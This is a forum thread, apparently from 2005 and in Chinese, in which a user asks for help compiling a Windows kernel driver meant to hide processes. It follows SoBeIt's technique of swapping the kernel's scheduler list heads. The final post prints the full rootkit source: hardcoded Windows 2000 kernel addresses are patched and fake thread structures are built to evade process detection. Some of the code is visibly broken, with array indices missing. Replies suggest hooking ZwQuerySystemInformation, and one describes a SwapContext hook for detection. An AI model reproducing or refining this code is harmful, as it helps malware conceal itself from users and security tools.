|
阅读:3738回复:14
有关利用驱动实现进程隐藏的问题
小弟我迫切需要帮助:
我在学习SoBeIt的“绕过内核调度链表进程检测”中的代码部分,但把里面的程序拿来调试时却遇到很多问题, 这个程序需要使用DDK调试吗? 我目前使用的是DDK+VC+DriverStudio调试,但现在遇到的问题是调试时,编译器报告: error LNK2001: unresolved external symbol "__declspec(dllimport) long __stdcall PsTerminateSystemThread(long)" (__imp_?PsTerminateSystemThread@@YGJJ@Z) proke.obj : error LNK2001: unresolved external symbol "__declspec(dllimport) void __stdcall ExFreePool(void *)" (__imp_?ExFreePool@@YGXPAX@Z) 但是“PsTerminateSystemThread”不是在“ntddk.h”中有声明吗,我在程序开头的头文件包括了: #include "ntddk.h" #include "ntifs.h" #include "stdio.h" #include "stdarg.h" 为什么会导致上面的错误呢,大虾们,同情一下嘛 //////////////////////////////////////////////////////////// 绕过内核调度链表进程检测(By SoBeIt) (http://www.xfocus.net/articles/200404/693.html) |
|
|
沙发#
发布于:2005-01-28 18:22
你出现的不是编译错误,而是linking error!
需要将相应DLL的Import LIB加入工程中, 或者使用LoadLibrary和GetProcAddress来进行显式调用。 |
|
|
|
板凳#
发布于:2005-01-28 18:29
呵呵,前两天刚刚搞的这个咚咚。
PsTerminateSystemThread是一个内核函数,你要在用户空间用的话会有这样的问题的。 你可以试试用GetProcAddress("ntdll.dll", "PsTerminateSystemThread"),显式获得该函数的地址,然后看看行不行。 对了,你的目的是什么?? |
|
|
|
地板#
发布于:2005-01-28 18:38
隐藏进程
|
|
|
地下室#
发布于:2005-01-29 00:21
他是驱动程序,不是应用程序....
|
|
|
|
5楼#
发布于:2005-01-29 11:10
内核函数是不能在应用层调用的,在98下可以通过门调用转到
RING0层进行访问。在2K,XP下还须做一个驱动程序. |
|
|
|
6楼#
发布于:2005-01-29 11:13
你出现的不是编译错误,而是linking error! 连接错误就没有错,但这个是内核函数,使用LoadLibrary和GetProcAddress来进行显式调用应该不能得到PsTerminateSystemThread和ExFreePool等函数的地址 |
|
|
|
7楼#
发布于:2005-01-29 11:36
psterminatesystemthread不是在ntddk.h中已经声明了的吗,怎么还会发生链接错误呢
|
|
|
8楼#
发布于:2005-01-29 11:45
[quote]你出现的不是编译错误,而是linking error! 连接错误就没有错,但这个是内核函数,使用LoadLibrary和GetProcAddress来进行显式调用应该不能得到PsTerminateSystemThread和ExFreePool等函数的地址 [/quote] 那怎么办呀....? :( |
|
|
9楼#
发布于:2005-01-31 10:41
MmGetSystemRoutineAddress
|
|
|
|
10楼#
发布于:2005-01-31 11:38
#ifdef DBG
TARGETLIBS="D:\\NTDDK\\libchk\\i386\\ntoskrnl.lib" #else TARGETLIBS="D:\\NTDDK\\libfre\\i386\\ntoskrnl.lib" #endif 上面的语句有什么错呢,为什么总是报: error C2501: 'TARGETLIBS' : missing storage-class or type specifiers |
|
|
11楼#
发布于:2005-01-31 11:40
#ifdef DBG
TARGETLIBS="D:\\NTDDK\\libchk\\i386\\ntoskrnl.lib" #else TARGETLIBS="D:\NTDDK\\libfre\\i386\\ntoskrnl.lib" #endif 上面的语句有什么错呢,为什么总是报: error C2501: 'TARGETLIBS' : missing storage-class or type specifiers |
|
|
12楼#
发布于:2005-01-31 14:29
建议你通过Hook ZwQuerySystemInformation来实现吧,写一个简单的驱动,只Hook这个函数就够了,网上有很多这样的帖子,你可以看看。
|
|
|
|
13楼#
发布于:2005-01-31 14:42
建议你通过Hook ZwQuerySystemInformation来实现吧,写一个简单的驱动,只Hook这个函数就够了,网上有很多这样的帖子,你可以看看。 你好象过于自信了吧??? 我通过挂钩SwapContext函数可以显示所有的进程(只要该线程被调度了),SOBEIT的方法只能针对2K下使用KLISTER,而挂钩SwapContext函数可以通用于2K/XP/2003等,等我修正了KLISTER贴出来,你们看看还有进程能被隐藏吗??嘿嘿...... |
|
|
|
14楼#
发布于:2005-01-31 15:39
干脆我们大家来看源代码吧:
///////////////////////////////////////// #include "ntddk.h" #include "ntifs.h" #include "stdio.h" #include "stdarg.h" typedef struct _DEVICE_EXTENSION { HANDLE hWorkerThread; KEVENT ExitEvent; PDEVICE_OBJECT pDeviceObject; BOOLEAN bExit; }DEVICE_EXTENSION, *PDEVICE_EXTENSION; typedef struct _FAKE_ETHREAD{ DISPATCHER_HEADER Header; LIST_ENTRY MutantListHead; PVOID InitialStack; PVOID StackLimit; struct _TEB *Teb; PVOID TlsArray; PVOID KernelStack; BOOLEAN DebugActive; UCHAR State; USHORT Alerted; UCHAR Iopl; UCHAR NpxState; UCHAR Saturation; UCHAR Priority; KAPC_STATE ApcState; ULONG ContextSwitches; NTSTATUS WaitStatus; UCHAR WaitIrql; UCHAR WaitMode; UCHAR WaitNext; UCHAR WaitReason; PKWAIT_BLOCK WaitBlockList; LIST_ENTRY WaitListEntry; ULONG WaitTime; UCHAR BasePriority; UCHAR DecrementCount; UCHAR PriorityDecrement; UCHAR Quantum; KWAIT_BLOCK WaitBlock[4]; ULONG LegoData; ULONG KernelApcDisable; ULONG UserAffinity; BOOLEAN SystemAffinityActive; UCHAR PowerState; UCHAR NpxIrql; UCHAR Pad[1]; PSERVICE_DESCRIPTOR_TABLE ServiceDescriptorTable; PKQUEUE Queue; KSPIN_LOCK ApcQueueLock; KTIMER Timer; LIST_ENTRY QueueListEntry; ULONG Affinity; BOOLEAN Preempted; BOOLEAN ProcessReadyQueue; BOOLEAN KernelStackResident; UCHAR NextProcessor; PVOID CallbackStack; PVOID Win32Thread; PKTRAP_FRAME TrapFrame; PKAPC_STATE ApcStatePointer[2]; UCHAR PreviousMode; BOOLEAN EnableStackSwap; BOOLEAN LargeStack; UCHAR ResourceIndex; ULONG KernelTime; ULONG UserTime; KAPC_STATE SavedApcState; BOOLEAN Alertable; UCHAR ApcStateIndex; BOOLEAN ApcQueueable; BOOLEAN AutoAlignment; PVOID StackBase; KAPC SuspendApc; KSEMAPHORE SuspendSemaphore; LIST_ENTRY ThreadListEntry; UCHAR FreezeCount; UCHAR SuspendCount; UCHAR IdealProcessor; BOOLEAN DisableBoost; LARGE_INTEGER CreateTime; union { LARGE_INTEGER ExitTime; LIST_ENTRY LpcReplyChain; }; union { NTSTATUS ExitStatus; PVOID OfsChain; }; LIST_ENTRY PostBlockList; LIST_ENTRY TerminationPortList; KSPIN_LOCK ActiveTimerListLock; LIST_ENTRY ActiveTimerListHead; CLIENT_ID Cid; }FAKE_ETHREAD, *PFAKE_ETHREAD; VOID ReplaceList(PVOID pContext) { PLIST_ENTRY pFirstEntry, pLastEntry, pPrevEntry, pNextEntry, pEntry; PLIST_ENTRY pNewKiDispatcherReadyListHead,pNewKiWaitInListHead,pNewKiWaitOutListHead; PLIST_ENTRY pKiDispatcherReadyListHead,pKiWaitInListHead,pKiWaitOutListHead; int i, ChangeList; int SysKiWaitInListHeadAddr[] = {0x8042d90b, 0x8042db78, 0x8042de57, 0x8042f176, 0x8046443b, 0x80464441, 0x804644d6}; int SysKiWaitOutListHeadAddr[] = {0x8042d921, 0x8042db90, 0x8042de6f, 0x8042f18e, 0x80464494}; int SysKiWaitOutListHeadAdd4Addr[] = {0x8046448e, 0x804644a1}; int SysKiDispatcherReadyListHeadAddr[] = {0x804041ff, 0x8042faad, 0x804313de, 0x80431568, 0x8043164f, 0x80431672, 0x8043379f, 0x8046462d}; int SysKiDispatcherReadyListHeadAdd4Addr = 0x8043166b; KIRQL OldIrql; KSPIN_LOCK DpcSpinLock; LARGE_INTEGER DelayTime; NTSTATUS Status; PDEVICE_EXTENSION pDevExt; PEPROCESS pEPROCESS; PETHREAD pETHREAD; ULONG PID; PFAKE_ETHREAD pFakeETHREAD; pDevExt = (PDEVICE_EXTENSION)pContext; DelayTime.QuadPart = -(10 * 1000 * 10000); pKiWaitInListHead = (PLIST_ENTRY)0x80482258; pKiWaitOutListHead = (PLIST_ENTRY)0x80482808; pKiDispatcherReadyListHead = (PLIST_ENTRY)0x804822e0; pNewKiWaitInListHead = (PLIST_ENTRY)ExAllocatePool(NonPagedPool,sizeof(LIST_ENTRY)); pNewKiWaitOutListHead = (PLIST_ENTRY)ExAllocatePool(NonPagedPool, sizeof(LIST_ENTRY)); pNewKiDispatcherReadyListHead = (PLIST_ENTRY)ExAllocatePool(NonPagedPool, 32 * sizeof(LIST_ENTRY)); InitializeListHead(pNewKiWaitInListHead); InitializeListHead(pNewKiWaitOutListHead); for(i = 0; i < 32; i++) { InitializeListHead(&pNewKiDispatcherReadyListHead); } KeInitializeSpinLock(&DpcSpinLock); __try { OldIrql = KeRaiseIrqlToDpcLevel(); KeAcquireSpinLockAtDpcLevel(&DpcSpinLock); pFirstEntry = pKiWaitInListHead->Flink; pLastEntry = pKiWaitInListHead->Blink; pNewKiWaitInListHead->Flink = pFirstEntry; pNewKiWaitInListHead->Blink = pLastEntry; pFirstEntry->Blink = pNewKiWaitInListHead; pLastEntry->Flink = pNewKiWaitInListHead; for(i = 0; i < 7; i++) { ChangeList = SysKiWaitInListHeadAddr; *(PULONG)ChangeList = (ULONG)pNewKiWaitInListHead; DbgPrint("NewWaitIn:%8x",*(PULONG)ChangeList); } pFirstEntry = pKiWaitOutListHead->Flink; pLastEntry = pKiWaitOutListHead->Blink; pNewKiWaitOutListHead->Flink = pFirstEntry; pNewKiWaitOutListHead->Blink = pLastEntry; pFirstEntry->Blink = pNewKiWaitOutListHead; pLastEntry->Flink = pNewKiWaitOutListHead; for(i = 0; i < 5; i++) { ChangeList = SysKiWaitOutListHeadAddr; *(PULONG)ChangeList = (ULONG)pNewKiWaitOutListHead; DbgPrint("NewWaitOut:%8x",*(PULONG)ChangeList); } for(i = 0; i < 2; i++) { ChangeList = SysKiWaitOutListHeadAdd4Addr; *(PULONG)ChangeList = (ULONG)pNewKiWaitOutListHead + 0x4; DbgPrint("NewWaitOut+4:%8x",*(PULONG)ChangeList); } for(i = 0; i < 32; i++) { if(pKiDispatcherReadyListHead.Flink != &pKiDispatcherReadyListHead) { pFirstEntry = pKiDispatcherReadyListHead.Flink; pLastEntry = pKiDispatcherReadyListHead.Blink; pNewKiDispatcherReadyListHead.Flink = pFirstEntry; pNewKiDispatcherReadyListHead.Blink = pLastEntry; pFirstEntry->Blink = &pNewKiDispatcherReadyListHead; pLastEntry->Flink = &pNewKiDispatcherReadyListHead; } } for(i = 0; i < 8; i++) { ChangeList = SysKiDispatcherReadyListHeadAddr; *(PULONG)ChangeList = (ULONG)pNewKiDispatcherReadyListHead; DbgPrint("NewDispatcher:%8x", *(PULONG)ChangeList); } ChangeList = SysKiDispatcherReadyListHeadAdd4Addr; *(PULONG)ChangeList = (ULONG)pNewKiDispatcherReadyListHead + 0x4; DbgPrint("NewDispatcher+4:%8x", *(PULONG)ChangeList); KeReleaseSpinLockFromDpcLevel(&DpcSpinLock); KeLowerIrql(OldIrql); for(;;) { InitializeListHead(pKiWaitInListHead); InitializeListHead(pKiWaitOutListHead); for(i = 0; i < 32; i++) { InitializeListHead(&pKiDispatcherReadyListHead); } for(pEntry = pNewKiWaitInListHead->Flink; pEntry && pEntry != pNewKiWaitInListHead; pEntry = pEntry->Flink) { pETHREAD = (PETHREAD)(((PCHAR)pEntry)-0x5c); pEPROCESS = (PEPROCESS)(pETHREAD->Tcb.ApcState.Process); PID = *(PULONG)(((PCHAR)pEPROCESS)+0x9c); if(PID == 0x8) { continue; } pFakeETHREAD =(PFAKE_ETHREAD)ExAllocatePool(PagedPool, sizeof(FAKE_ETHREAD)); memcpy(pFakeETHREAD, pETHREAD, sizeof(FAKE_ETHREAD)); InsertHeadList(pKiWaitInListHead, &pFakeETHREAD->WaitListEntry); } for(pEntry = pNewKiWaitOutListHead->Flink; pEntry && pEntry != pNewKiWaitOutListHead; pEntry = pEntry->Flink) { pETHREAD = (PETHREAD)(((PCHAR)pEntry)-0x5c); pEPROCESS = (PEPROCESS)(pETHREAD->Tcb.ApcState.Process); PID = *(PULONG)(((PCHAR)pEPROCESS)+0x9c); if(PID == 0x8) { continue; } pFakeETHREAD = (PFAKE_ETHREAD)ExAllocatePool(PagedPool, sizeof(FAKE_ETHREAD)); memcpy(pFakeETHREAD, pETHREAD, sizeof(FAKE_ETHREAD)); InsertHeadList(pKiWaitOutListHead, &pFakeETHREAD->WaitListEntry); } for(i = 0; i < 32 ; i++) { for(pEntry = pNewKiDispatcherReadyListHead.Flink; pEntry && pEntry != &pNewKiDispatcherReadyListHead; pEntry = pEntry->Flink) { pETHREAD = (PETHREAD)(((char *)pEntry)-0x5c); pEPROCESS = (PEPROCESS)(pETHREAD->Tcb.ApcState.Process); PID = *(ULONG *)(((char *)pEPROCESS)+0x9c); if(PID == 0x8) { continue; } pFakeETHREAD = (PFAKE_ETHREAD)ExAllocatePool(PagedPool, sizeof(FAKE_ETHREAD)); memcpy(pFakeETHREAD, pETHREAD, sizeof(FAKE_ETHREAD)); InsertHeadList(&pKiDispatcherReadyListHead, &pFakeETHREAD->WaitListEntry); } } DbgPrint("pKiWaitInListHead->Flink:%8x", pKiWaitInListHead->Flink); DbgPrint("pKiWaitInListHead->Blink:%8x", pKiWaitInListHead->Blink); DbgPrint("pKiWaitOutListHead->Flink:%8x", pKiWaitOutListHead->Flink); DbgPrint("pKiWaitOutListHead->Blink:%8x", pKiWaitOutListHead->Blink); DbgPrint("pKiDispatcherReadyListHead[0].Flink:%8x", pKiDispatcherReadyListHead[0].Flink); DbgPrint("pKiDispatcherReadyListHead[0].Blink:%8x", pKiDispatcherReadyListHead[0].Blink); Status = KeWaitForSingleObject(&pDevExt->ExitEvent, Executive, KernelMode, FALSE, &DelayTime); if(Status == STATUS_SUCCESS) break; } OldIrql = KeRaiseIrqlToDpcLevel(); KeAcquireSpinLockAtDpcLevel(&DpcSpinLock); pFirstEntry = pNewKiWaitInListHead->Flink; pLastEntry = pNewKiWaitInListHead->Blink; pKiWaitInListHead->Flink = pFirstEntry; pKiWaitInListHead->Blink = pLastEntry; pFirstEntry->Blink = pKiWaitInListHead; pLastEntry->Flink = pKiWaitInListHead; for(i = 0; i < 7; i++) { ChangeList = SysKiWaitInListHeadAddr; *(PULONG)ChangeList = (ULONG)pKiWaitInListHead; DbgPrint("OrgWaitIn:%8x",*(PULONG)ChangeList); } pFirstEntry = pNewKiWaitOutListHead->Flink; pLastEntry = pNewKiWaitOutListHead->Blink; pKiWaitOutListHead->Flink = pFirstEntry; pKiWaitOutListHead->Blink = pLastEntry; pFirstEntry->Blink = pKiWaitOutListHead; pLastEntry->Flink = pKiWaitOutListHead; for(i = 0; i < 5; i++) { ChangeList = SysKiWaitOutListHeadAddr; *(PULONG)ChangeList = (ULONG)pKiWaitOutListHead; DbgPrint("OrgWaitOut:%8x",*(PULONG)ChangeList); } for(i = 0; i < 2; i++) { ChangeList = SysKiWaitOutListHeadAdd4Addr; *(PULONG)ChangeList = (ULONG)pKiWaitOutListHead + 0x4; DbgPrint("OrgWaitOut+4:%8x",*(PULONG)ChangeList); } for(i = 0; i < 32; i++) { if(pNewKiDispatcherReadyListHead.Flink != &pNewKiDispatcherReadyListHead) { pFirstEntry = pNewKiDispatcherReadyListHead.Flink; pLastEntry = pNewKiDispatcherReadyListHead.Blink; pKiDispatcherReadyListHead.Flink = pFirstEntry; pKiDispatcherReadyListHead.Blink = pLastEntry; pFirstEntry->Blink = &pKiDispatcherReadyListHead; pLastEntry->Flink = &pKiDispatcherReadyListHead; } } for(i = 0; i < 8; i++) { ChangeList = SysKiDispatcherReadyListHeadAddr; *(PULONG)ChangeList = (ULONG)pKiDispatcherReadyListHead; DbgPrint("NewDispatcher:%8x", *(PULONG)ChangeList); } ChangeList = SysKiDispatcherReadyListHeadAdd4Addr; *(PULONG)ChangeList = (ULONG)pKiDispatcherReadyListHead + 0x4; DbgPrint("NewDispatcher+4:%8x", *(PULONG)ChangeList); KeReleaseSpinLockFromDpcLevel(&DpcSpinLock); KeLowerIrql(OldIrql); ExFreePool(pNewKiWaitInListHead); ExFreePool(pNewKiWaitOutListHead); ExFreePool(pNewKiDispatcherReadyListHead); DbgPrint("Now terminate system thread.n"); PsTerminateSystemThread(STATUS_SUCCESS); } __except(EXCEPTION_EXECUTE_HANDLER) { DbgPrint("Error occured in ReplaceList().n"); } return; } void DriverUnload(IN PDRIVER_OBJECT pDriObj) { WCHAR DevLinkBuf[] = L"\??\SchList"; UNICODE_STRING uniDevLink; PDEVICE_OBJECT pDevObj; PVOID pWorkerThread; PDEVICE_EXTENSION pDevExt; NTSTATUS Status; LARGE_INTEGER WaitTime; WaitTime.QuadPart = -(8 * 1000 * 10000); pDevObj = pDriObj->DeviceObject; pDevExt = (PDEVICE_EXTENSION)pDevObj->DeviceExtension; pDevExt->bExit = TRUE; __try { KeSetEvent(&pDevExt->ExitEvent, 0, FALSE); KeDelayExecutionThread(KernelMode, FALSE, &WaitTime); DbgPrint("SchList:Worker thread killed.n"); } __except(EXCEPTION_EXECUTE_HANDLER) { DbgPrint("Error occured in Unload().n"); } if(pDevObj) { RtlInitUnicodeString(&uniDevLink,DevLinkBuf); IoDeleteSymbolicLink(&uniDevLink); IoDeleteDevice(pDevObj); DbgPrint(("SchList.sys:Driver Unload successfully.n")); //return STATUS_SUCCESS; } DbgPrint(("SchList.sys:Detect device failed.n")); //return STATUS_SUCCESS; } NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriObj, IN PUNICODE_STRING puniRegPath) { WCHAR DevNameBuf[] = L"\Device\SchList"; UNICODE_STRING uniDevName; WCHAR DevLinkBuf[] = L"\??\SchList"; UNICODE_STRING uniDevLink; PDEVICE_OBJECT pDevObj; PDEVICE_EXTENSION pDevExt; NTSTATUS status; int pKiDispatcherReadyListHeadAddr = 0x804822e0; int pKiWaitInListHeadAddr = 0x80482258; int pKiWaitOutListHeadAddr = 0x80482808; DbgPrint(("SchList:Enter DriverEntry.n")); RtlInitUnicodeString(&uniDevName,DevNameBuf); status = IoCreateDevice(pDriObj, sizeof(DEVICE_EXTENSION), &uniDevName, FILE_DEVICE_UNKNOWN, 0, FALSE, &pDevObj); if(!NT_SUCCESS(status)) { DbgPrint(("SchList.sys:Create device failed.n")); return status; } DbgPrint(("SchList.sys:Create device successfully.n")); pDevExt = (PDEVICE_EXTENSION) pDevObj->DeviceExtension; pDevExt->pDeviceObject = pDevObj; KeInitializeEvent(&pDevExt->ExitEvent, SynchronizationEvent, 0); RtlInitUnicodeString(&uniDevLink,DevLinkBuf); status = IoCreateSymbolicLink(&uniDevLink, &uniDevName); if(!NT_SUCCESS(status)) { DbgPrint(("SchList.sys:Create symbolic link failed.n")); return status; } pDriObj->DriverUnload = DriverUnload; PsCreateSystemThread(&pDevExt->hWorkerThread, (ACCESS_MASK)0L, NULL, (HANDLE)0L, NULL, ReplaceList, pDevExt); return STATUS_SUCCESS; } 开头那里有个ntifs.h,这个文件是干嘛的哟,DDK里没有,我是到网上找的一个, 以上就是全部代码,各位,帮帮忙看看,为什么我在VC+DDK+DS里总是把它调不正确 指点指点吧! [编辑 - 2/1/05 by znsoft] |
|